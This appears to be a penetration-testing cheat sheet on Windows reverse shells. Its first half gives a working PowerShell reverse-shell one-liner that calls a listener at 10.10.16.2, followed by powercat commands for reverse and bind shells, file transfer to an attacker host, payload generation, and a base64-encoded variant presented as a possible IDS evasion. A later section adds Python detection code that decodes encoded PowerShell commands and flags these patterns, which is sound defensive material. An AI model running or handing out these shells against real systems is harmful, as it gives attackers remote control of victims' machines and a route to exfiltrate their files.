Reverse Shell

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
Powercat

Powercat is a PowerShell script that can be copied to a Windows host. It builds on PowerShell's built-in networking and simplifies the creation of bind and reverse shells. The script is found under /usr/share/windows-resources/powercat. Once uploaded, dot-source it so its functions are loaded into the current session:

```powershell
PS C:\Users\Offsec> . .\powercat.ps1
```
With the script loaded, running powercat without arguments prints its usage message:

```powershell
PS C:\Users\offsec> powercat
You must select either client mode (-c) or listen mode (-l).
```
Reverse shell:

```powershell
powercat -c <attacker_ip> -p <port> -e cmd.exe
```
Bind shell:

```powershell
powercat -l -p 443 -e cmd.exe
```
File Transfer:

First open a listening port with netcat on the receiving side and redirect what arrives into a file:

```shell
sudo nc -lnvp 443 > receiving_powercat.ps1
```

Then, with the -i flag, choose the path of the file to send:

```powershell
powercat -c <attacker_ip> -p <port> -e cmd.exe -i C:\Windows\Privesc\revershell.ps1
```
Stand-Alone Payload

With the -g flag powercat generates the payload instead of running it. Redirect its output to a file, and that file can then be executed as a PowerShell script:

```powershell
powercat -c <attacker_ip> -p <port> -e cmd.exe -g > revershell.ps1
```
Encoded version (could … but unlikely, evade IDS):

First create the file with the -ge flag, which emits the payload base64-encoded:

```powershell
powercat -c <attacker_ip> -p <port> -e cmd.exe -ge > revershell.ps1
```

The encoded payload is run by passing it to powershell.exe with the -E (EncodedCommand) flag:

```powershell
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAHIAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAsACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAgACAAIAAgAGkAZgAoACQAZwBsAG8AYgBhAGwAOgBWAGUAcgBiAG8AcwBlACkAewAkAFYAZQByAGIAbwBzAGUAIAA9ACAAJABUAHIAdQBlAH0ACgAgACAAIAAgACQARgB1AG4AYwBWAGEAcgBzACAAPQAgAEAAewB9AAoAIAAgACAAIABpAGYAKAAhACQAbAApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAJABGAHUAbgBjAFYAYQByAHMAWwAiAGwAIgBdACAAPQAgACQARgBhAGwAcwBlAAoAIAAgACAAIAAgACAAJABTAG8AYwBrAGUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAKACAAIAAgACA
```
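From the defender's side, everything on this page leaves the same footprint in process-creation logging (Sysmon Event ID 1, Windows 4688 with command-line auditing, or an EDR): the hidden-window and execution-policy switches of the first one-liner, the System.Net.Sockets.TcpClient and GetStream/iex pattern, and, for the -ge/-E variant, a base64 blob that is UTF-16LE text once decoded. The following is an added detection example, not code from this page or from the powercat project. It scans constructed command-line samples, decodes any -E/-EncodedCommand argument (tolerating a truncated blob, as copied logs often are) and re-applies the same indicators to the decoded text. The rule names, the scoring threshold and the sample lines are assumptions made for this example; the decode check at the end uses the opening of the encoded payload shown on this page.

```python
import base64
import binascii
import re
from typing import Dict, List

# Indicators drawn from the commands on this page; rule names are hypothetical.
TEXT_INDICATORS = {
    "hidden-window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "exec-bypass": re.compile(r"-Exec(?:utionPolicy)?\s+Bypass", re.I),
    "noprofile-noninteractive": re.compile(r"-NoP\w*\s+-NonI", re.I),
    "tcp-client": re.compile(r"System\.Net\.Sockets\.TcpClient", re.I),
    "stream-exec": re.compile(r"GetStream\(\).*\biex\b", re.I | re.S),
    "powercat": re.compile(r"\bpowercat\b", re.I),
}
# -E, -EC, -Enc and -EncodedCommand all select the encoded-command switch.
ENCODED_FLAG = re.compile(r"-E(?:C|nc|ncodedCommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# First characters of the encoded payload shown on this page (used only to test decoding).
PAGE_BLOB_PREFIX = "ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAA"


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text. Re-pad the blob so a
    truncated copy still decodes, and drop a dangling odd byte."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    try:
        raw = base64.b64decode(blob, validate=False)
    except (ValueError, binascii.Error):
        return ""
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Return the indicator hits for one command line, including hits found
    only after decoding an encoded command argument."""
    hits = [name for name, rx in TEXT_INDICATORS.items() if rx.search(cmdline)]
    decoded = ""
    match = ENCODED_FLAG.search(cmdline)
    if match:
        decoded = decode_encoded_command(match.group(1))
        hits += ["encoded:" + name for name, rx in TEXT_INDICATORS.items()
                 if rx.search(decoded)]
    # Two or more independent indicators is the (assumed) alerting threshold.
    return {"hits": hits, "decoded": decoded, "suspicious": len(hits) >= 2}


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Run the analysis over a batch of command lines; keep only suspicious ones."""
    results = []
    for line in lines:
        verdict = analyze_command_line(line)
        if verdict["suspicious"]:
            verdict["cmdline"] = line
            results.append(verdict)
    return results


def _encode_for_e_switch(text: str) -> str:
    # How the -E argument is formed (base64 over UTF-16LE); used to build a sample only.
    return base64.b64encode(text.encode("utf-16-le")).decode()


# Constructed sample command lines (not real telemetry).
SAMPLE_LOGS = [
    # Benign administrative use of PowerShell.
    "powershell.exe -NoProfile -Command Get-Service",
    # Switch combination and socket pattern of the one-liner on this page (fragment, 192.0.2.10 is TEST-NET).
    'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object '
    'System.Net.Sockets.TCPClient("192.0.2.10", 1234);$stream = $client.GetStream(); ... iex $data',
    # Encoded invocation whose decoded text resembles a powercat -ge payload header.
    "powershell.exe -E " + _encode_for_e_switch(
        "# generated by powercat -ge (constructed fragment)\n"
        "function Stream1_Setup { $Socket = New-Object System.Net.Sockets.TcpClient }"
    ),
]

if __name__ == "__main__":
    for verdict in scan_logs(SAMPLE_LOGS):
        print(verdict["hits"], "<-", verdict["cmdline"][:60])
    print(decode_encoded_command(PAGE_BLOB_PREFIX))
```

The decode step is the one that matters for the -ge variant: the raw command line shows nothing but base64, so a rule that only matches plaintext switches misses it, while a rule that decodes first sees the same TcpClient string the plaintext one-liner exposes. The page's own encoded payload decodes to a script whose first line is `function Stream1_Setup`, which is where the powercat indicator is worth applying.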